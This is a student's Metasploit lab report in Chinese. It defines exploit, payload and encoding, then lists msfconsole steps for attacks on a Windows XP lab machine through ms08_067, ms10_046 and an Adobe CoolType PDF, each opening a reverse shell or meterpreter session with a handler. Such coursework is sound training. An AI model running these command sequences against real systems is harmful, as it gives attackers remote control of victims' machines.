Exp5 MSF基礎應用
Exp5 MSF基礎應用 20155239呂宇軒
基礎問題回答
1、用自己的話解釋什麽是exploit,payload,encode?
exploit :
Exploit的英文意思就是利用,在做攻擊時,通常稱為漏洞利用。
一個利用程序(An exploit)就是一段通過觸發一個漏洞(或者幾個漏洞)進而控制目標系統的代碼。
exploits利用代碼可以在本地也可在遠程進行。一個遠程攻擊利用允許攻擊者遠程操縱計算機,理想狀態下能夠執行任意代碼。
payload :
payload屬於名詞,意為有效載荷,在病毒代碼中實現一些有害的或者惡性的動作的部分叫做“有效負載”(payload)。
payload可以實現任何運行在受害者環境中的程序所能做的事情,並且能夠執行動作包括破壞文件刪除文件,向病毒的作者或者任意的接收者發送敏感信息,以及提供通向被感染計算機的後門。
encode :
encode本意為編碼,可在不改變payload功能的情況下對其進行編碼,一些好的編碼方式可以使攻擊或相關的文件不被發現。
實踐內容
一、主動攻擊:ms08_067漏洞攻擊
攻擊機:kali linux x64
靶機: windows XP SP3(English)
實驗前準備:將windows XP的防火墻關閉;進入msfconsole界面。
1、先用 search ms08_067 指令查詢針對該漏洞可以運用的攻擊模塊:
根據提示,使用
use exploit/windows/smb/ms08_067_netapi
使用該模塊,並使用
show payloads
查看可以供我們使用的payload:
可查看到有很多可以使用的正常的payload。
2、選擇通過反向連接來獲取shell的 generic/shell_reverse_tcp 作為payload,使用指令
set payload generic/shell_reverse_tcp
對payload進行設置,並使用 show options 查看:
3、發現源端口和目的端口是默認固定的,需要設置一個RHOST(靶機的IP地址)和一個LHOST(攻擊機的IP地址):
使用
show options
查看設置結果:
4、接著使用 exploit 指令開始攻擊:
5、攻擊成功後獲取了靶機的shell,此時可使用 systeminfo 指令查看靶機系統信息:
二、對瀏覽器攻擊:ms10_046漏洞攻擊
1、利用
search ms10_046
指令查看可以運用的攻擊模塊:
2、根據提示,使用
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用該模塊,並使用show payloads查看:
3、使用
set payload windows/meterpreter/reverse_tcp 設置payload
,並使用show options查看參數:
SRVHOST填的是本地監聽主機的IP地址,LHOST也是監聽的IP地址,所以這裏SRVHOST和LHOST都應該填攻擊機的IP地址:
4、使用xp系統打開鏈接: **http://192.168.52.131:80/**:
此時kali顯示接入一個會話:
5、使用
sessions -i 1
選擇會話1,成功獲取了靶機的shell,利用 systeminfo 指令查看靶機的系統信息:
三、對Adobe的漏洞攻擊
1、先使用search adobe查詢和adobe漏洞有關的模塊:
2、個人選擇:
exploit/windows/fileformat/adobe_cooltype_sing
,然後show payloads查看payload:
3、選擇
windows/meterpreter/reverse_tcp
,並使用show options查看參數:
只需建立本地主機IP:LHOST,輸入 exploit 將在固定的位置生成相應的文件:
5、在文件查看處選擇顯示隱藏文件,在相應的位置找到msf.pdf:
6、將文件拷貝至windows XP下,並在kali下輸入:
use exploit/multi/handler
set LHOST 192.168.220.130
set LPORT 4444
exploit
7、將win XP下的PDF打開,攻擊機成功獲取到靶機shell:
失敗了很多次 盡快補好 謝謝老師
Exp5 MSF基礎應用